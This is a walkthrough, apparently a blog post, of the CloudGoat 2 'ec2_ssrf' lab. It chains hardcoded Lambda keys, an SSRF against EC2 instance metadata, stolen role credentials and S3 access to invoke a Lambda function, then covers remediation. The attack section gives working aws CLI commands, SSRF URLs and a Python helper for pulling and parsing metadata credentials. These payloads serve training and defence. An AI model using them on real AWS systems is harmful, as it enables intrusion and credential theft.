This is Part Three of a five-part series of articles looking at the newly released CloudGoat 2 from Rhino Security Labs, a “vulnerable by design” AWS deployment tool for helping the community learn and practice pen test methods on AWS.

In Parts One and Two we concentrated on IAM privilege escalation using various methods. For this scenario, we are looking to invoke a Lambda function by first exploiting a Server-Side Request Forgery vulnerability in an application running on an EC2 instance.

Starting as the IAM user Solus, the attacker discovers they have ReadOnly permissions to a Lambda function, where hardcoded secrets lead them to an EC2 instance running a web application that is vulnerable to server-side request forgery (SSRF). After exploiting the vulnerable app and acquiring keys from the EC2 metadata service, the attacker gains access to a private S3 bucket with a set of keys that allow them to invoke the Lambda function and complete the scenario.

The scenario can be deployed in the same way as the others:

./cloudgoat.py create ec2_ssrf

Based on my experiences so far, I’m going to skip straight to the permissions around the scenario goal to find out what we can do with the Lambda function.

The Exploit

First, let’s see if we can enumerate Lambda functions in the account:

aws lambda list-functions --region us-east-1

This gives us the following:

{
  "Functions": [
    {
      "FunctionName": "cg-lambda-cgid2mb1iai3fd",
      "FunctionArn": "arn:aws:lambda:us-east-1:123456789012:function:cg-lambda-cgid2mb1iai3fd",
      "Runtime": "python3.6",
      "Role": "arn:aws:iam::123456789012:role/cg-lambda-role-cgid2mb1iai3fd-service-role",
      "Handler": "lambda.handler",
      "CodeSize": 223,
      "Description": "",
      "Timeout": 3,
      "MemorySize": 128,
      "LastModified": "2019-06-29T11:39:43.152+0000",
      "CodeSha256": "xt7bNZt3fzxtjSRjnuCKLV/dOnRCTVKM3D1u/BeK8zA=",
      "Version": "$LATEST",
      "Environment": {
        "Variables": {
          "EC2_ACCESS_KEY_ID": "AKIAWRT3VKZYA7IBV2U6",
          "EC2_SECRET_KEY_ID": "cfnubWlZZ3jPj4w4lD7YeEdBThjaV1e3imJ54zRZ"
        }
      },
      "TracingConfig": {
        "Mode": "PassThrough"
      },
      "RevisionId": "8c492564-071b-4b93-b55a-2e9e5bc333fc"
    }
  ]
}

This is great news for me, but not so much for the unfortunate account holder - a developer appears to have stored access keys in the environment variables. Let’s skip straight to those to see if we can use them to invoke the Lambda function - this could be the quickest and easiest scenario yet!
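Spotting keys by eye is easy with a single function, but in a larger account it can help to scan the output of aws lambda list-functions programmatically. Below is a minimal Python sketch that assumes the JSON output has been saved to a file. The function name and the regex are my own illustration, not part of CloudGoat. It only flags values that look like access key IDs (long-term IAM user keys start with AKIA, temporary STS keys with ASIA), so secret keys and other secrets would need separate heuristics.

```python
import json
import re

# Access key IDs are 20 characters: a 4-character prefix plus 16 uppercase alphanumerics.
# AKIA = long-term IAM user key, ASIA = temporary (STS) key.
ACCESS_KEY_ID = re.compile(r"^(AKIA|ASIA)[A-Z0-9]{16}$")


def find_key_like_env_vars(list_functions_json: str) -> list:
    """Return (function name, variable name) pairs whose value looks like an access key ID."""
    findings = []
    for function in json.loads(list_functions_json).get("Functions", []):
        # Functions without environment variables have no "Environment" key at all.
        variables = function.get("Environment", {}).get("Variables", {})
        for name, value in variables.items():
            if ACCESS_KEY_ID.match(value):
                findings.append((function["FunctionName"], name))
    return findings
```

For the output above, saving it with aws lambda list-functions --region us-east-1 > functions.json and passing the file's contents to find_key_like_env_vars flags EC2_ACCESS_KEY_ID on cg-lambda-cgid2mb1iai3fd.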

Running the same command with the compromised credentials (aws lambda list-functions --region us-east-1) returns an AccessDeniedException. If these keys can’t even list Lambda functions, it’s unlikely they can invoke one.

So a reasonable guess is that these credentials are meant for a service that the Lambda function calls or needs access to, and the variable names (EC2_ACCESS_KEY_ID and EC2_SECRET_KEY_ID) point to EC2.

Ok, so maybe we’ve jumped the gun a bit - let’s go back to using the original credentials and see if we can find out anything more about the function.

aws lambda get-function --function-name cg-lambda-cgid2mb1iai3fd --region us-east-1 gives us the same details as above, plus the following:

"Code": {
  "RepositoryType": "S3",
  "Location": "https://prod-04-2014-tasks.s3.amazonaws.com/snapshots/123456789012/cg-lambda-cgid2mb1iai3fd-484d3597-3523-45ef-a2d9-ec65603c6e6f?versionId=u3jJ3_aVER5Q9kHEXAi1eUeAKREqtjyx&X-Amz-Security-Token=AgoJb3JpZ2luX2VjEDEaCXVzLWVhc3QtMSJHMEUCIDZjYaGfZlrhOWs7dct7S9l3PgtPe%2B0Str3rZ%2F2rzXhvAiEA%2BkxYj23DVUMwGxpNck55WHDer22s0UxTyrg23qsUX10q2gMIeRAAGgw3NDk2Nzg5MDI4MzkiDHvx07dBdwGbK9hs1yq3A%2FHNfp2xpjrGToqtuELp670MahsK7OIfUYMHxru214UN4u9ypfNvZ%2BCjVeJcUgRcLb%2FOCtLx%2FauHHuZIUtpIE6pCueL%2Fz8dq%2FK5m4%2BN6IN%2FNL%2BbwtX6M%2BNBccwxTIPn2DpLNOv8%2FnQyEnNeCccECK69L25uCQ1Dx2Rmc55twtx8r8sprramgOSVuVSKZVAqUeIaV0VGz%2BtR72aPLQH3NH8%2F1TRRrqEnOQa8zei8YCvgdCLCHM6jT5wNu%2F6f7KgV3SHybmVN2CeEUkCouz6h2TWC8Ek2igW%2Fc8y3Q1BtKcaTetNbuxwFO%2FSsnltRIyWpYJ%2FjcxUS%2BxyXWIfqb1eHFwZyljI4TmdlszuBX175AXRhLv3RtkBcY2SIoQWPmM%2BDYwE26fp0RifZhn1dCUSoeLbyfWJEKN9f7DwFqIli2yX37ci%2BKYzmA2c9irFyNgvfmMJYQLoswER8U%2FVS8SjrgLD%2FQdxXxLNzNdL5P4OMy%2FZ4bO8EjFerAqL3Nq4OcbNmATk7pGTWxvm%2BBZ%2F9Cf3mC9ct%2FA0dCL7iSfsvknsLXUs%2Fsj7UkRTDVSE%2BIuL1SZ6CY%2Fued6KfSm9EwoKDe6AU6tAHrtK4UkWHducc7Y80flaVUH%2Fl91%2FKfu%2FEL3CXsZnP9oQ2z8UyP%2FETnmHbbb6W6EFGL8Muz3kNlNeqt%2BxuxZwqSZS%2BKsS1Ue1%2B1SoEjSQGmf0kjuLDFWB7SFy3lWwgcStmfz53LIxq71gPA90pl%2FwVy15wluyNnus47C2cJcnYsOgSkbN0ycjCOYHum9Nni%2BCYY1SwdrvrE%2B3FCJH2FjJno1yfZPvkuN3FIFcTdW33ep4crgY4%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20190629T175209Z&X-Amz-SignedHeaders=host&X-Amz-Expires=600&X-Amz-Credential=ASIA25DCYHY3YVZBCSFN%2F20190629%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=96f705589242e61603cdb80b8dbc2c54341c71f5f3185b6e411ef5daa340f307"
}

This shows us that S3 is involved: the Location is a pre-signed S3 URL from which the function’s deployment package can be downloaded. It looks like we have a possible attack vector here that we’ll return to later.
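Because the Location value is a SigV4 pre-signed URL, it only works for a limited time: X-Amz-Expires=600 means ten minutes from the X-Amz-Date signing time. If you want to download the deployment package (with curl, for example) and read the function’s code, it helps to know when the link expires. Here is a small standard-library Python sketch. The function name is my own.

```python
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlparse


def presigned_url_expiry(url: str) -> datetime:
    """Return the UTC time after which a SigV4 pre-signed URL is no longer valid."""
    params = parse_qs(urlparse(url).query)
    # X-Amz-Date is the signing time in ISO 8601 basic format, e.g. 20190629T175209Z.
    signed_at = datetime.strptime(params["X-Amz-Date"][0], "%Y%m%dT%H%M%SZ")
    signed_at = signed_at.replace(tzinfo=timezone.utc)
    # X-Amz-Expires is how long, in seconds, the signature stays valid.
    return signed_at + timedelta(seconds=int(params["X-Amz-Expires"][0]))
```

Passing it the Location above gives 18:02:09 UTC on 29 June 2019, ten minutes after signing. After that, you need to run get-function again to get a fresh link.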

Before we return to S3, using our new credentials we’ll take a look at EC2 instances by running aws ec2 describe-instances --region us-east-1. The more interesting parts of the output are shown below:

"PrivateDnsName": "ip-10-10-10-222.ec2.internal",
"PrivateIpAddress": "10.10.10.222",
"ProductCodes": [],
"PublicDnsName": "ec2-3-88-24-5.compute-1.amazonaws.com",
"PublicIpAddress": "3.88.24.5",
"State": {
  "Code": 16,
  "Name": "running"
},
"IamInstanceProfile": {
  "Arn": "arn:aws:iam::123456789012:instance-profile/cg-ec2-instance-profile-cgid2mb1iai3fd",
  "Id": "AIPAWRT3VKZYJU27BJFDD"
}

As you can see, the instance has a public address and an attached IAM instance profile. First, let’s browse to that address and see what we get:

TypeError: URL must be a string, not undefined
    at new Needle (/node_modules/needle/lib/needle.js:156:11)
    at Function.module.exports.(anonymous function) [as get] (/node_modules/needle/lib/needle.js:785:12)
    at /home/ubuntu/app/ssrf-demo-app.js:32:12
    at Layer.handle [as handle_request] (/node_modules/express/lib/router/layer.js:95:5)
    at next (/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/node_modules/express/lib/router/layer.js:95:5)
    at /node_modules/express/lib/router/index.js:281:22
    at Function.process_params (/node_modules/express/lib/router/index.js:335:12)
    at next (/node_modules/express/lib/router/index.js:275:10)

Right, I’m going to cheat a little now. Since I know we’re abusing an SSRF vulnerability, and the error very helpfully tells me that the app expected a URL and got undefined instead, I’m going to go straight ahead and see if we can retrieve instance metadata.



In my opinion, AWS could do a better job of protecting instance metadata. The metadata service provides credentials to applications running on EC2 instances and is only accessible from the instance itself, but querying http://169.254.169.254/ doesn’t require any special HTTP headers in the request.

As a result, if an application is vulnerable to Server-Side Request Forgery (SSRF), a malicious actor can get the application to send HTTP requests on their behalf. If that application is running on an EC2 instance, those requests can reach the instance metadata. Requiring a specific HTTP header would close off this route to the metadata, since a typical SSRF lets the attacker control the URL but not the headers the application sends.
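To make the mechanism concrete, here’s a hypothetical Python stand-in for the kind of handler the stack trace points to. The real app is Node.js using needle, and I haven’t seen its source. The handler takes a url query parameter and fetches it server-side. The attacker chooses the URL, but the request is made from the instance, with whatever headers the application decides to send. The fetch function is injected so the sketch can be exercised without network access.

```python
from urllib.parse import parse_qs, urlparse


def vulnerable_fetch_proxy(request_url: str, fetch) -> str:
    """Hypothetical SSRF-prone handler: fetch whatever the ?url= parameter points at."""
    target = parse_qs(urlparse(request_url).query).get("url", [None])[0]
    if target is None:
        # Mirrors the error the demo app produced when no URL was supplied.
        raise TypeError("URL must be a string, not undefined")
    # No validation: the server will request internal or link-local
    # addresses such as 169.254.169.254 on the caller's behalf.
    return fetch(target)
```

In a real application, fetch would be something like urllib.request.urlopen(target).read(). The fix is not in the fetch call itself but in validating target before it gets there.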

We can exploit this here as follows:

http://ec2-3-88-24-5.compute-1.amazonaws.com/?url=http://169.254.169.254/latest/meta-data/

Returns:



http://ec2-3-88-24-5.compute-1.amazonaws.com/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

Returns:



Just append the role name from the very helpful application, and bingo - we have yet another set of credentials!

http://ec2-3-88-24-5.compute-1.amazonaws.com/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-cgid2mb1iai3fd


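The three requests above follow a fixed pattern, so they’re easy to script. Here is a minimal Python sketch. It assumes the app URL from this scenario and that the final response is the JSON credentials document returned by the metadata service, which includes AccessKeyId, SecretAccessKey, Token and Expiration among its fields. The sketch percent-encodes the target URL. The unencoded form used above works against this app, but encoding avoids surprises if the target ever contains its own ? or &, and Express decodes query values before the app sees them.

```python
import json
from urllib.parse import quote

APP_URL = "http://ec2-3-88-24-5.compute-1.amazonaws.com/"
METADATA_URL = "http://169.254.169.254/latest/meta-data/"


def ssrf_url(metadata_path: str = "") -> str:
    """Wrap a metadata path in the vulnerable app's ?url= parameter, percent-encoded."""
    return APP_URL + "?url=" + quote(METADATA_URL + metadata_path, safe="")


def parse_role_credentials(body: str) -> dict:
    """Keep the key ID, secret, session token and expiry from a security-credentials response."""
    document = json.loads(body)
    return {key: document[key] for key in ("AccessKeyId", "SecretAccessKey", "Token", "Expiration")}


# The three requests made above, in order.
steps = [
    ssrf_url(),
    ssrf_url("iam/security-credentials/"),
    ssrf_url("iam/security-credentials/cg-ec2-role-cgid2mb1iai3fd"),
]
```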

Let’s switch to using those keys and see what we can do.
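One detail that’s easy to miss when switching: credentials from the metadata service are temporary (their access key IDs start with ASIA), so the CLI also needs the session token. Setting AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN in the environment is enough, which in a shell means three export lines. The Python sketch below builds the same environment for a subprocess. The helper name cli_env is hypothetical.

```python
import os
from typing import Dict, Optional


def cli_env(access_key_id: str, secret_access_key: str,
            session_token: Optional[str] = None) -> Dict[str, str]:
    """Copy the current environment and point the AWS CLI at the given keys."""
    env = dict(os.environ)
    env["AWS_ACCESS_KEY_ID"] = access_key_id
    env["AWS_SECRET_ACCESS_KEY"] = secret_access_key
    if session_token:
        # Required for temporary (ASIA...) credentials such as the EC2 role's.
        env["AWS_SESSION_TOKEN"] = session_token
    else:
        # Long-term keys: make sure a stale token from a previous role isn't sent.
        env.pop("AWS_SESSION_TOKEN", None)
    return env
```

For example, subprocess.run(["aws", "s3", "ls"], env=cli_env(key_id, secret, token)) runs the bucket listing with the role’s keys, without touching your shell’s own settings.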

So, since we know from earlier that S3 is involved with the function somehow, let’s head straight there and see what we have.

First, we’ll get all of the buckets in the account using aws s3 ls, which confirms that there is a bucket in the account called cg-secret-s3-bucket-cgid2mb1iai3fd. We can attempt to list the contents with aws s3 ls s3://cg-secret-s3-bucket-cgid2mb1iai3fd and copy them locally with the command aws s3 cp s3://cg-secret-s3-bucket-cgid2mb1iai3fd/admin-user.txt ./ if we have the relevant permissions (spoiler alert - we do!).

Cool, so let’s see what that text file contains.

nano ./admin-user.txt

Yes, I use nano, don’t @ me. Why make things more complicated than necessary, especially when you need to exit the editor quickly?

Awesome, we have even more credentials - I’m beginning to lose track. Let’s use those to see if we have any more permissions on the Lambda function.
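With four sets of credentials in play (Solus, the Lambda environment keys, the EC2 role and now admin-user), named profiles make it much easier to keep track. The AWS CLI reads profiles from ~/.aws/credentials, an INI file with aws_access_key_id, aws_secret_access_key and, for temporary keys, aws_session_token. The Python sketch below renders that format with configparser. The profile names are my own. To avoid clobbering your real file, you could write the output elsewhere and point AWS_SHARED_CREDENTIALS_FILE at it.

```python
import configparser
import io
from typing import Dict, Optional


def render_credentials(profiles: Dict[str, Dict[str, Optional[str]]]) -> str:
    """Render {profile: {setting: value}} in the ~/.aws/credentials INI format."""
    # interpolation=None so any '%' characters in values are written verbatim.
    parser = configparser.ConfigParser(interpolation=None)
    for profile, settings in profiles.items():
        # Drop unset values, e.g. no aws_session_token for long-term keys.
        parser[profile] = {key: value for key, value in settings.items() if value}
    buffer = io.StringIO()
    parser.write(buffer)
    return buffer.getvalue()
```

Each set is then selected with --profile, for example aws lambda list-functions --profile admin-user --region us-east-1.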

First, using the new credentials from admin-user.txt, we’ll check that we have some permissions by re-running the command from earlier, aws lambda list-functions. That works, so let’s see if we can invoke the function.

aws lambda invoke --function-name cg-lambda-cgid2mb1iai3fd ./lambda.txt --region us-east-1

“You win!”

Summary and Remediation

Although Lambda encrypts Environment Variables at rest, as we saw above this offers no protection against anyone who can read the function’s configuration. It’s also worth noting that Environment Variables are not encrypted in transit by default (for example, during deployment) unless you enable Lambda’s client-side encryption helpers.

This can be addressed by using services such as AWS Secrets Manager and AWS Systems Manager Parameter Store, or third-party solutions such as HashiCorp’s Vault. There’s a walkthrough of how to use the AWS solutions here.
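As an illustration of the Secrets Manager route, here’s a minimal Python sketch of a function fetching its keys at runtime instead of reading them from environment variables. It assumes a secret stored as a JSON string (the name example/ec2-credentials is hypothetical) and a function role that is allowed to call secretsmanager:GetSecretValue. boto3 ships with the Lambda Python runtimes. The client parameter exists only so the sketch can be tested without AWS. With this approach, the value no longer appears in the function configuration, so it wouldn’t show up in list-functions output the way it did for Solus.

```python
import json


def get_secret(secret_id: str, client=None) -> dict:
    """Fetch a JSON secret from AWS Secrets Manager at runtime."""
    if client is None:
        import boto3  # included in the AWS Lambda Python runtimes

        client = boto3.client("secretsmanager")
    response = client.get_secret_value(SecretId=secret_id)
    # String secrets are returned in SecretString (binary ones in SecretBinary).
    return json.loads(response["SecretString"])
```

Parameter Store works in much the same way through boto3.client("ssm").get_parameter(Name=..., WithDecryption=True)["Parameter"]["Value"].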

As for the SSRF, there are two issues to remediate here. The first, and most obvious, is the vulnerability in the application itself. A key defense is to validate user input rather than blindly passing it to functions that make requests. Wherever possible, you should also whitelist allowed domains and protocols.
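Here is a minimal sketch of the whitelisting idea in Python. It assumes the application only ever needs to fetch from a fixed set of HTTPS hosts (api.example.com below is a placeholder). It checks the parsed hostname rather than matching strings, which matters for tricks like https://api.example.com@169.254.169.254/, where the real host is the metadata address.

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"api.example.com"}  # placeholder whitelist for illustration


def is_allowed_url(url: str) -> bool:
    """Allow only HTTPS URLs on the default port to whitelisted hosts."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False
    try:
        port = parsed.port
    except ValueError:  # malformed or out-of-range port
        return False
    if port not in (None, 443):
        return False
    # .hostname is lower-cased and excludes any user:password@ prefix.
    return parsed.hostname in ALLOWED_HOSTS
```

This only validates the URL the user supplies. The HTTP client should also refuse to follow redirects to hosts that aren’t whitelisted. Otherwise, an allowed host that redirects to 169.254.169.254 would bypass the check.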

The second issue here is the accessibility of the EC2 metadata. While looking around for a way to enforce headers in HTTP requests to the service, I came across this article from Netflix. As you’d expect, it’s full of good advice and worth a read, but doesn’t go into detail on how to implement this. I’ll address this in a future post and go through the steps required to implement it.
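For anyone reading this later, AWS has since released version 2 of the instance metadata service (IMDSv2, November 2019), which requires the kind of header this post argues for. A client first obtains a session token with a PUT request to /latest/api/token, then presents that token in the X-aws-ec2-metadata-token header. An instance can be set to require this with aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required. An SSRF like this one lets the attacker choose the URL but not the method or headers, so the plain GET we used would no longer return credentials. Below is a minimal standard-library Python sketch of the two requests. fetch_metadata only works when run on an EC2 instance.

```python
import urllib.request

IMDS_BASE = "http://169.254.169.254"


def token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """IMDSv2 step 1: PUT /latest/api/token (TTL in seconds, max 21600 = 6 hours)."""
    return urllib.request.Request(
        IMDS_BASE + "/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def metadata_request(path: str, token: str) -> urllib.request.Request:
    """IMDSv2 step 2: GET a metadata path, presenting the session token."""
    return urllib.request.Request(
        IMDS_BASE + "/latest/meta-data/" + path,
        headers={"X-aws-ec2-metadata-token": token},
    )


def fetch_metadata(path: str, timeout: float = 2.0) -> str:
    """Run both steps; only works from inside an EC2 instance."""
    with urllib.request.urlopen(token_request(), timeout=timeout) as response:
        token = response.read().decode()
    with urllib.request.urlopen(metadata_request(path, token), timeout=timeout) as response:
        return response.read().decode()
```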